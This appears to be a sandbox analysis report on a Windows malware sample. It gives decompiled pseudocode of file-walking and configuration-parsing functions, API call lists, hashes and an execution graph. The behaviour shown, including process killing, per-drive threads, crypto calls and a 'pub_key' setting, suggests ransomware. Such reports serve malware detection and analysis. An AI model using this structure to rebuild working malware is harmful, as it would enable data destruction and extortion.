                                      0x00403a5c

                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID: 0@$@@$T@$d@$t@$|@
                                      • API String ID: 54951025-2847450446
                                      • Opcode ID: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
                                      • Instruction ID: 81848ed92efb6c47f2188ed1792c8f7cddf9ec8f0008dcc1071cc611d3409556
                                      • Opcode Fuzzy Hash: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
                                      • Instruction Fuzzy Hash: D5114EB4501B448FC7A0CF6AC58468ABFF0BB08718B409D2EE99A97B50D3B5B458CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00406769() {
                                      				intOrPtr* _t34;
                                      				intOrPtr* _t38;
                                      				void* _t40;
                                      				WCHAR* _t46;
                                      				void* _t51;
                                      
                                      				do {
                                      					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                      						lstrcatW(_t46, _t51 - 0x238);
                                      						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                      							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                      							 *_t38 =  *_t38 + E004063B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
                                      							asm("adc [ebx+0x4], edx");
                                      							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                      							if(__eflags <= 0) {
                                      								if(__eflags < 0) {
                                      									L8:
                                      									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                      									 *_t34 =  *_t34 + 1;
                                      									__eflags =  *_t34;
                                      								} else {
                                      									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                      									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							E004066F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                      						}
                                      						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                      					}
                                      				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                      				FindClose( *(_t51 - 8));
                                      				return 0;
                                      			}








                                      0x00406770
                                      0x00406784
                                      0x004067a8
                                      0x004067b1
                                      0x004067e2
                                      0x004067ed
                                      0x004067ef
                                      0x004067f2
                                      0x004067f5
                                      0x004067f7
                                      0x00406800
                                      0x00406800
                                      0x00406803
                                      0x00406803
                                      0x004067f9
                                      0x004067fc
                                      0x004067fe
                                      0x00000000
                                      0x00000000
                                      0x004067fe
                                      0x004067f7
                                      0x004067b3
                                      0x004067c7
                                      0x004067cc
                                      0x00406810
                                      0x00406810
                                      0x00406823
                                      0x0040682e
                                      0x0040683c

                                      APIs
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
                                      • lstrcatW.KERNEL32(00000000,?), ref: 004067A8
                                      • lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
                                        • Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                        • Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                        • Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
                                      • FindClose.KERNEL32(00003000,?,?), ref: 0040682E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 2032009209-0
                                      • Opcode ID: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
                                      • Instruction ID: 9b87114a5c2e2fa11aec6284b95cd243dd4daa46cd42d80c1a26711d7dff17e5
                                      • Opcode Fuzzy Hash: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
                                      • Instruction Fuzzy Hash: 6F012D31A0021DABDF21AB60DC48BEE7BB8EF44704F0444B6F806E61A1D7798A91CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403190(char _a4) {
                                      				char _t6;
                                      				CHAR* _t13;
                                      				CHAR* _t16;
                                      
                                      				_t1 =  &_a4; // 0x405135
                                      				_t13 =  *_t1;
                                      				_t16 = _t13;
                                      				if( *_t13 == 0) {
                                      					L5:
                                      					lstrcmpiA(_t13, "mask");
                                      					_t2 =  &_a4; // 0x405135
                                      					_t10 =  ==  ? 1 : 0;
                                      					lstrcmpiA( *_t2, "pub_key");
                                      					 *_t16 = 0x3d;
                                      					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                      					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                      					return  ==  ? 2 :  ==  ? 1 : 0;
                                      				} else {
                                      					while(1) {
                                      						_t6 =  *_t16;
                                      						if(_t6 == 0x7d) {
                                      							break;
                                      						}
                                      						if(_t6 == 0x3d) {
                                      							 *_t16 = 0;
                                      							goto L5;
                                      						} else {
                                      							_t16 =  &(_t16[1]);
                                      							if( *_t16 != 0) {
                                      								continue;
                                      							} else {
                                      								goto L5;
                                      							}
                                      						}
                                      						goto L8;
                                      					}
                                      					return 0;
                                      				}
                                      				L8:
                                      			}






                                      0x00403193
                                      0x00403193
                                      0x00403197
                                      0x0040319c
                                      0x004031b0
                                      0x004031b9
                                      0x004031c4
                                      0x004031ce
                                      0x004031d1
                                      0x004031d9
                                      0x004031e1
                                      0x004031e4
                                      0x004031e9
                                      0x004031a0
                                      0x004031a0
                                      0x004031a0
                                      0x004031a4
                                      0x00000000
                                      0x00000000
                                      0x004031a8
                                      0x004031ec
                                      0x00000000
                                      0x004031aa
                                      0x004031aa
                                      0x004031ae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031ae
                                      0x00000000
                                      0x004031a8
                                      0x004031f5
                                      0x004031f5
                                      0x00000000

                                      APIs
                                      • lstrcmpiA.KERNEL32(5Q@,mask,5Q@,?,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031B9
                                      • lstrcmpiA.KERNEL32(5Q@,pub_key,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID: 5Q@$5Q@$mask$pub_key
                                      • API String ID: 1586166983-363831109
                                      • Opcode ID: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
                                      • Instruction ID: 77421031a41d7d6ff0c7d7d831153f50eac579c1ccc453c74b5f930fdf35060a
                                      • Opcode Fuzzy Hash: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
                                      • Instruction Fuzzy Hash: 09F0F6713082845EF7194E689C41BA3BFCD9B59311F5805BFE689E62D1C6BD8D81839C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 00403B32
                                      • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                      • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                      • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                      • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion_memset
                                      • String ID:
                                      • API String ID: 3299124433-0
                                      • Opcode ID: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
                                      • Instruction ID: 675139515f83daa62978cf2687ed4dcf32745b37c88ce0392e5ff862a27301cc
                                      • Opcode Fuzzy Hash: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
                                      • Instruction Fuzzy Hash: 83111EB0D4031C6EEB609B65DC0ABEA7ABCEF08704F008199A548F61C1D6B95B948FD5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00404BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                      				CHAR* _v8;
                                      				char _v12;
                                      				char _v20;
                                      				char _t16;
                                      				char _t20;
                                      				char _t21;
                                      				intOrPtr* _t24;
                                      				intOrPtr _t25;
                                      				intOrPtr _t26;
                                      				intOrPtr* _t29;
                                      				CHAR* _t33;
                                      				intOrPtr _t34;
                                      				intOrPtr _t35;
                                      				void* _t38;
                                      				void* _t41;
                                      				intOrPtr* _t42;
                                      				void* _t47;
                                      				void* _t49;
                                      				intOrPtr* _t51;
                                      				CHAR* _t53;
                                      
                                      				asm("movq xmm0, [0x40ff2c]");
                                      				_t16 =  *0x40ff34; // 0x0
                                      				_t29 = _a4;
                                      				_v8 = __edx;
                                      				_t51 = __ecx;
                                      				asm("movq [ebp-0x10], xmm0");
                                      				_v12 = _t16;
                                      				if( *_t29 == 0) {
                                      					L11:
                                      					if(_t51 == 0) {
                                      						goto L10;
                                      					} else {
                                      						if(_v20 == 0) {
                                      							L22:
                                      							if(_t51 == 0) {
                                      								goto L10;
                                      							} else {
                                      								_t53 = _t51 + lstrlenA( &_v20);
                                      								while(1) {
                                      									_t20 =  *_t53;
                                      									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                      										break;
                                      									}
                                      									_t53 =  &(_t53[1]);
                                      								}
                                      								_t33 = _t53;
                                      								while(1) {
                                      									_t21 =  *_t33;
                                      									if(_t21 < 0x30 || _t21 > 0x39) {
                                      										goto L30;
                                      									}
                                      									L31:
                                      									_t33 =  &(_t33[1]);
                                      									continue;
                                      									L30:
                                      									if(_t21 == 0x2e) {
                                      										goto L31;
                                      									}
                                      									 *_t33 = 0;
                                      									return lstrcpyA(_v8, _t53);
                                      									goto L33;
                                      								}
                                      							}
                                      						} else {
                                      							_t34 =  *_t51;
                                      							if(_t34 != 0) {
                                      								_t47 = _t51 -  &_v20;
                                      								do {
                                      									_t24 =  &_v20;
                                      									if(_t34 == 0) {
                                      										L19:
                                      										if( *_t24 == 0) {
                                      											goto L22;
                                      										} else {
                                      											goto L20;
                                      										}
                                      									} else {
                                      										while(1) {
                                      											_t35 =  *_t24;
                                      											if(_t35 == 0) {
                                      												goto L22;
                                      											}
                                      											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                      											if(_t41 != 0) {
                                      												goto L19;
                                      											} else {
                                      												_t24 = _t24 + 1;
                                      												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                      													continue;
                                      												} else {
                                      													goto L19;
                                      												}
                                      											}
                                      											goto L33;
                                      										}
                                      										goto L22;
                                      									}
                                      									goto L33;
                                      									L20:
                                      									_t34 =  *((intOrPtr*)(_t51 + 1));
                                      									_t51 = _t51 + 1;
                                      									_t47 = _t47 + 1;
                                      								} while (_t34 != 0);
                                      							}
                                      							goto L10;
                                      						}
                                      					}
                                      				} else {
                                      					_t25 =  *__ecx;
                                      					if(_t25 == 0) {
                                      						L10:
                                      						return lstrcpyA(_v8, "fabian wosar <3");
                                      					} else {
                                      						_t49 = __ecx - _t29;
                                      						do {
                                      							_t42 = _t29;
                                      							if(_t25 == 0) {
                                      								L8:
                                      								if( *_t42 == 0) {
                                      									goto L11;
                                      								} else {
                                      									goto L9;
                                      								}
                                      							} else {
                                      								while(1) {
                                      									_t26 =  *_t42;
                                      									if(_t26 == 0) {
                                      										goto L11;
                                      									}
                                      									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                      									if(_t38 != 0) {
                                      										goto L8;
                                      									} else {
                                      										_t42 = _t42 + 1;
                                      										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                      											continue;
                                      										} else {
                                      											goto L8;
                                      										}
                                      									}
                                      									goto L33;
                                      								}
                                      								goto L11;
                                      							}
                                      							goto L33;
                                      							L9:
                                      							_t25 =  *((intOrPtr*)(_t51 + 1));
                                      							_t51 = _t51 + 1;
                                      							_t49 = _t49 + 1;
                                      						} while (_t25 != 0);
                                      						goto L10;
                                      					}
                                      				}
                                      				L33:
                                      			}























                                      0x00404ba6
                                      0x00404bae
                                      0x00404bb4
                                      0x00404bb9
                                      0x00404bbc
                                      0x00404bc1
                                      0x00404bc6
                                      0x00404bc9
                                      0x00404c1a
                                      0x00404c1c
                                      0x00000000
                                      0x00404c1e
                                      0x00404c22
                                      0x00404c5f
                                      0x00404c61
                                      0x00000000
                                      0x00404c63
                                      0x00404c6d
                                      0x00404c70
                                      0x00404c70
                                      0x00404c74
                                      0x00000000
                                      0x00000000
                                      0x00404c7a
                                      0x00404c7a
                                      0x00404c7d
                                      0x00404c80
                                      0x00404c80
                                      0x00404c84
                                      0x00000000
                                      0x00000000
                                      0x00404c8e
                                      0x00404c8e
                                      0x00000000
                                      0x00404c8a
                                      0x00404c8c
                                      0x00000000
                                      0x00000000
                                      0x00404c95
                                      0x00404ca4
                                      0x00000000
                                      0x00404ca4
                                      0x00404c80
                                      0x00404c24
                                      0x00404c24
                                      0x00404c28
                                      0x00404c2f
                                      0x00404c31
                                      0x00404c31
                                      0x00404c36
                                      0x00404c4f
                                      0x00404c52
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c38
                                      0x00404c38
                                      0x00404c38
                                      0x00404c3c
                                      0x00000000
                                      0x00000000
                                      0x00404c45
                                      0x00404c47
                                      0x00000000
                                      0x00404c49
                                      0x00404c49
                                      0x00404c4d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c4d
                                      0x00000000
                                      0x00404c47
                                      0x00000000
                                      0x00404c38
                                      0x00000000
                                      0x00404c54
                                      0x00404c54
                                      0x00404c57
                                      0x00404c58
                                      0x00404c59
                                      0x00404c5d
                                      0x00000000
                                      0x00404c28
                                      0x00404c22
                                      0x00404bcb
                                      0x00404bcb
                                      0x00404bcf
                                      0x00404c05
                                      0x00404c19
                                      0x00404bd1
                                      0x00404bd3
                                      0x00404bd5
                                      0x00404bd5
                                      0x00404bd9
                                      0x00404bf7
                                      0x00404bfa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404bdb
                                      0x00404be0
                                      0x00404be0
                                      0x00404be4
                                      0x00000000
                                      0x00000000
                                      0x00404bed
                                      0x00404bef
                                      0x00000000
                                      0x00404bf1
                                      0x00404bf1
                                      0x00404bf5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404bf5
                                      0x00000000
                                      0x00404bef
                                      0x00000000
                                      0x00404be0
                                      0x00000000
                                      0x00404bfc
                                      0x00404bfc
                                      0x00404bff
                                      0x00404c00
                                      0x00404c01
                                      0x00000000
                                      0x00404bd5
                                      0x00404bcf
                                      0x00000000

                                      APIs
                                      • lstrcpyA.KERNEL32(?,fabian wosar <3,?,00404E7E), ref: 00404C0D
                                      • lstrlenA.KERNEL32(00000000,?,00404E7E), ref: 00404C67
                                      • lstrcpyA.KERNEL32(?,?,?,00404E7E), ref: 00404C98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID: fabian wosar <3
                                      • API String ID: 367037083-1724090804
                                      • Opcode ID: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
                                      • Instruction ID: 61f71b58efb5150348b69fdc6af893256ae21e9068894ab04c691d9c03621922
                                      • Opcode Fuzzy Hash: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
                                      • Instruction Fuzzy Hash: CE3128A180E1955BEB328E6844143BBBFA19FC3301F1A01BBCAD1B7386D2394C46C798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:6.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:700
                                      Total number of Limit Nodes:10
                                      execution_graph 1568 404af0 1571 4048a0 Sleep 1568->1571 1614 404550 1571->1614 1574 4048c2 CreateThread 1576 4048e0 WaitForSingleObject 1574->1576 1577 40490c 1574->1577 1575 4048ba ExitProcess 1578 404902 CloseHandle 1576->1578 1579 4048f6 TerminateThread 1576->1579 1630 404640 CreateToolhelp32Snapshot VirtualAlloc 1577->1630 1578->1577 1579->1578 1581 404911 1641 4040a0 1581->1641 1585 40491e 1586 40496c ExitProcess 1585->1586 1589 404974 1585->1589 1587 4049ae 1590 404a21 1587->1590 1591 4049d8 lstrlenA VirtualAlloc CryptStringToBinaryA 1587->1591 1589->1587 1592 404998 Sleep 1589->1592 1664 405750 1589->1664 1708 403ff0 1590->1708 1591->1590 1593 404a19 ExitProcess 1591->1593 1592->1589 1596 404a4b 1717 403de0 VirtualAlloc GetTickCount 1596->1717 1597 404a3e 1711 403fc0 1597->1711 1601 404a53 DeleteCriticalSection 1725 403a60 AllocateAndInitializeSid 1601->1725 1603 404a63 1604 404a6c VirtualAlloc 1603->1604 1729 404330 1603->1729 1606 404ab3 1604->1606 1607 404a89 GetModuleFileNameW 1604->1607 1609 404ad6 1606->1609 1610 404abc ShellExecuteW 1606->1610 1736 403ba0 1607->1736 1747 405fc0 VirtualFree VirtualFree 1609->1747 1610->1609 1613 404ade ExitProcess 1748 4039b0 GetProcessHeap 1614->1748 1616 404587 1749 406d90 1616->1749 1620 404599 VirtualAlloc 1622 4045b8 lstrcpyW lstrlenW 1620->1622 1841 4069a0 1622->1841 1624 4045e9 CreateMutexW GetLastError 1625 404601 GetLastError 1624->1625 1626 40460a VirtualFree 1624->1626 1625->1626 1867 407720 1626->1867 1631 4047d8 1630->1631 1634 4047eb 1630->1634 1632 4047e3 Process32FirstW 1631->1632 1631->1634 1632->1634 1633 404800 lstrcmpiW 1633->1634 1635 40480f OpenProcess 1633->1635 1634->1633 1637 404844 Process32NextW 1634->1637 1635->1634 1636 404821 TerminateProcess CloseHandle 1635->1636 1636->1634 1637->1634 1638 404857 1637->1638 1639 404869 CloseHandle 1638->1639 1640 40485b VirtualFree 1638->1640 1639->1581 1640->1639 1642 4040bb 1641->1642 1643 40431c 1641->1643 1939 4039b0 GetProcessHeap 1642->1939 1661 405ef0 VirtualAlloc VirtualAlloc 1643->1661 1645 4040e6 1646 406d90 105 API calls 1645->1646 1647 4040ef 1646->1647 1648 406ba0 16 API calls 1647->1648 1649 4040f8 VirtualAlloc 1648->1649 1650 404119 1649->1650 1651 4069a0 49 API calls 1650->1651 1652 404134 1651->1652 1653 404140 lstrlenW 1652->1653 1660 404170 1653->1660 1654 404236 1655 4042d1 VirtualAlloc 1654->1655 1656 404302 VirtualFree 1654->1656 1655->1656 1658 4042ed wsprintfW 1655->1658 1659 407720 10 API calls 1656->1659 1657 4041c0 lstrcpyW lstrlenW 1657->1654 1657->1660 1658->1656 1659->1643 1660->1654 1660->1657 1940 405d80 CryptAcquireContextW 1661->1940 1948 4039b0 GetProcessHeap 1664->1948 1666 405794 1667 406d90 105 API calls 1666->1667 1668 40579d 1667->1668 1669 406ba0 16 API calls 1668->1669 1670 4057a6 VirtualAlloc 1669->1670 1671 4057de 1670->1671 1672 405c14 1671->1672 1673 40584b 6 API calls 1671->1673 1676 405c1f VirtualFree 1672->1676 1674 4058ca lstrlenA 1673->1674 1677 4058f2 lstrlenA 1674->1677 1678 407720 10 API calls 1676->1678 1681 405942 lstrlenA 1677->1681 1685 40590e lstrlenA 1677->1685 1680 405c35 1678->1680 1680->1589 1682 405971 lstrcatW lstrlenW 1681->1682 1688 40594b lstrlenA 1681->1688 1684 4069a0 49 API calls 1682->1684 1689 405999 12 API calls 1684->1689 1686 40593e 1685->1686 1686->1681 1688->1682 1690 405a3a lstrlenW 1689->1690 1949 408b30 1690->1949 1694 405abd 1695 405ad4 CryptBinaryToStringA 1694->1695 1696 405b00 GetLastError 1695->1696 1697 405b06 lstrlenA VirtualAlloc lstrlenA 1695->1697 1696->1697 1698 405b2e lstrlenA 1697->1698 1700 405b6e lstrlenA MultiByteToWideChar 1698->1700 1704 405b47 lstrlenA 1698->1704 1951 405370 1700->1951 1704->1700 1705 405ba6 VirtualFree VirtualFree VirtualFree 1705->1676 1706 405bd7 VirtualFree VirtualFree VirtualFree 1706->1672 1709 403ffd VirtualAlloc 1708->1709 1710 404018 InitializeCriticalSection 1708->1710 1709->1710 1710->1596 1710->1597 1712 403fd4 1711->1712 1713 403de0 290 API calls 1712->1713 1714 403fdc 1713->1714 2078 405fc0 VirtualFree VirtualFree 1714->2078 1716 403fe4 1716->1601 1718 403e40 GetDriveTypeW 1717->1718 1719 403e55 1718->1719 1719->1718 1720 403e5a CreateThread 1719->1720 1721 403e9e WaitForMultipleObjects GetTickCount 1719->1721 1720->1719 1722 403eff 1721->1722 1722->1722 2079 405540 VirtualAlloc 1722->2079 1724 403fad 1724->1601 1726 403a9a 1725->1726 1727 403a9e GetModuleHandleA GetProcAddress 1725->1727 1726->1603 1728 403ac0 FreeSid 1727->1728 1728->1603 2106 403ae0 1729->2106 1731 404344 VirtualAlloc 1733 4044fb 1731->1733 1734 4044ff GetSystemDirectoryW lstrcatW ShellExecuteW 1731->1734 1735 40452f VirtualFree 1733->1735 1734->1735 1735->1604 1737 403ae0 4 API calls 1736->1737 1739 403bb6 1737->1739 1738 403dba VirtualFree 1738->1606 1739->1738 1740 403a60 4 API calls 1739->1740 1741 403bc3 1740->1741 1741->1738 1742 403bcb ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1741->1742 1743 403da0 ShellExecuteExW 1742->1743 1744 403dc1 WaitForSingleObject CloseHandle ExitProcess 1743->1744 1745 403da7 1743->1745 1745->1743 1746 403dad VirtualFree 1745->1746 1746->1738 1747->1613 1748->1616 1750 406da9 VirtualAlloc GetUserNameW 1749->1750 1751 406dce 1749->1751 1750->1751 1752 406dd4 VirtualAlloc GetComputerNameW 1751->1752 1753 406df6 1751->1753 1752->1753 1754 406e02 VirtualAlloc 1753->1754 1755 406e56 1753->1755 1754->1755 1756 406e19 1754->1756 1757 406e60 VirtualAlloc RegOpenKeyExW 1755->1757 1758 406ef5 1755->1758 1888 406d10 RegOpenKeyExW 1756->1888 1762 406e9c RegQueryValueExW 1757->1762 1763 406ede VirtualFree 1757->1763 1759 407024 1758->1759 1760 406eff VirtualAlloc VirtualAlloc 1758->1760 1764 4070d6 1759->1764 1765 40702e VirtualAlloc RegOpenKeyExW 1759->1765 1766 406f40 wsprintfW RegOpenKeyExW 1760->1766 1767 406ec0 1762->1767 1768 406ec9 GetLastError 1762->1768 1763->1758 1773 407134 1764->1773 1774 4070dc GetNativeSystemInfo VirtualAlloc 1764->1774 1769 40706a RegQueryValueExW 1765->1769 1770 4070ac 1765->1770 1771 406f75 RegQueryValueExW 1766->1771 1783 406f97 1766->1783 1775 406ecf RegCloseKey 1767->1775 1768->1775 1776 407097 GetLastError 1769->1776 1777 40708e 1769->1777 1781 406d10 5 API calls 1770->1781 1778 406fa0 GetLastError 1771->1778 1771->1783 1772 406e34 1772->1755 1782 406e51 wsprintfW 1772->1782 1779 407155 1773->1779 1780 40713a 1773->1780 1784 4070ff wsprintfW 1774->1784 1775->1758 1775->1763 1786 40709d RegCloseKey 1776->1786 1777->1786 1787 406fa6 RegCloseKey 1778->1787 1789 4072e9 1779->1789 1790 40715f VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW RegOpenKeyExW 1779->1790 1893 407520 VirtualAlloc VirtualAlloc 1780->1893 1791 4070c9 wsprintfW 1781->1791 1782->1755 1783->1766 1783->1787 1796 406ffd 1783->1796 1784->1773 1786->1764 1786->1770 1787->1783 1793 406fb5 lstrcmpiW 1787->1793 1802 4074a0 1789->1802 1803 4072f9 VirtualAlloc 1789->1803 1794 407200 RegQueryValueExW 1790->1794 1795 40726d wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1790->1795 1791->1764 1792 40714e 1792->1779 1793->1783 1801 406fc7 wsprintfW 1793->1801 1804 407225 1794->1804 1805 40722e GetLastError 1794->1805 1799 4072c2 VirtualFree 1795->1799 1800 4072ab lstrlenW 1795->1800 1797 407001 wsprintfW 1796->1797 1798 40700e VirtualFree 1796->1798 1797->1798 1798->1759 1799->1789 1800->1799 1801->1783 1806 4074a9 VirtualAlloc 1802->1806 1807 404590 1802->1807 1821 407345 1803->1821 1809 407234 RegCloseKey 1804->1809 1805->1809 1810 4074e4 1806->1810 1811 4074c7 1806->1811 1823 406ba0 1807->1823 1809->1795 1812 407243 lstrlenW 1809->1812 1810->1807 1911 4068f0 1811->1911 1813 406d10 5 API calls 1812->1813 1813->1795 1815 407370 GetDriveTypeW 1815->1821 1817 4074d2 VirtualFree 1817->1810 1818 407397 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1820 407471 lstrcatW 1818->1820 1818->1821 1819 407491 lstrlenW 1819->1802 1820->1821 1821->1815 1821->1818 1821->1819 1822 40740a lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1821->1822 1822->1821 1824 406bb0 1823->1824 1825 406c0a 1824->1825 1826 406bef lstrlenW lstrlenW 1824->1826 1827 406c10 lstrlenW lstrlenW 1825->1827 1828 406c2b 1825->1828 1826->1825 1827->1828 1829 406c31 lstrlenW lstrlenW 1828->1829 1830 406c4c 1828->1830 1829->1830 1831 406c52 lstrlenW lstrlenW 1830->1831 1832 406c6d 1830->1832 1831->1832 1833 406c73 lstrlenW lstrlenW 1832->1833 1834 406c8e 1832->1834 1833->1834 1835 406c94 lstrlenW lstrlenW 1834->1835 1836 406caf 1834->1836 1835->1836 1837 406cd9 1836->1837 1838 406cbe lstrlenW lstrlenW 1836->1838 1839 406ce2 lstrlenW lstrlenW 1837->1839 1840 406d07 1837->1840 1838->1837 1839->1620 1840->1620 1842 4069ba lstrcatW lstrcatW lstrcatW 